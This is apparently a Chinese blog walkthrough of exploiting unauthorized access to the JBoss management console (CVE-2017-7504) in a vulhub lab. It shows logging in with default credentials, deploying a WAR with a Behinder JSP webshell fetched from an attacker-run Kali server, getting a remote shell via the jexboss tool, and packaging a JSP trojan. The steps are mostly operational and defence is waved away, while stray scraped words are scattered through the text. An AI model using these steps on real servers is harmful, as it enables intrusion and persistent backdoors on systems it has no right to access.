JBOSS是一個基於J2EE的開放源代碼的應用服務器。 JBoss代碼遵循LGPL許可,能夠在任何商業應用中無償使用。JBoss是一個管理EJB的容器和服務器,支持EJB 1.一、EJB 2.0和EJB3的規範。但JBoss核心服務不包括支持servlet/JSP的WEB容器,通常與Tomcat或Jetty綁定使用。html
未受權訪問管理控制檯,經過該漏洞,能夠後臺管理服務,能夠經過腳本命令執行系統命令,如反彈shell,wget寫webshell文件。python
漏洞環境:vulhub上的CVE-2017-7504
進入到CVE-2017-7504目錄執行docker-compose up -dgit
說白了,這個未受權就是不須要用戶名和密碼就進入控制檯,而後利用應用部署來部署war包,war包裏有個jsp的馬,而後真香!!!github
靶機的ip爲192.168.66.134.
訪問192.168.66.134:8080,進入jboss。web
看到以下界面,點擊紅色框選的:
網上的一些帖子說的是無用戶名和密碼登陸的,也就是說不須要密碼。可是我這裏用vulhub搭建的竟然須要用戶名和密碼,額,我人品的問題???隨便試了試,用戶名、密碼都是admin,進入控制檯。
docker
又點這個唄,進入應用部署界面。進入以後找到下面的部分:
shell
ParamValue部分填寫遠程服務器上的木馬的地址。
這裏用kali的apache2來弄,畢竟簡單。
進入kali,輸入service apache2 start
啓動apache2.(能夠輸入service apache2 status
來看看是否開啓,下圖就是開啓狀態了)
而後即是將war包放在/var/www/html目錄,至於爲啥放這裏,請自行百度一哈。
我這裏用的是冰蠍的bingxie.war。
而後就是在ParamValue處填寫地址了,我這裏就填寫http://192.168.66.129/bingxie.war
注:192.168.66.129是kali的ip地址
而後就點Invoke。回顯一下頁面,就知道能夠了。
去看看到底弄好沒,輸入http://192.168.66.134:8080/bingxie/
後面的bingxie就是前面部署的war包的名字
看到了shell.jsp,能夠拿出冰蠍了。
apache
git clone https://github.com/joaomatosf/jexboss cd jexboss python3 jexboss.py
出現如下界面即是可以正常使用。
也能夠輸入python3 jexboss.py -h
查看具體參數。
這裏我是輸入:python3 jexboss.py -u 192.168.66.134:8080
執行命令後出現下面的界面就說明能夠搞事情:
等執行完後會彈出個選擇yes or no,固然選yes。yes就是建立鏈接。
一輸入yes,我本機的火絨就搞事情了。。。
真就管的寬,不過我喜歡!!!
回到正題,輸入yes後,就會有個shell的命令行,舒服啊!
服務器
首先你得有Java環境,而後進入jdk目錄下的bin目錄(例如C:\Program Files\Java\jdk1.8.0_101\bin),進入命令行。
輸入jar cvf shell.war shell.jsp
注:shell.war是你要作出了的war文件,shell.jsp是提早準備的jsp木馬文件
誒,弄完了。。。溜了溜了,防護啥的隨便找點文章看看,多的很。jsp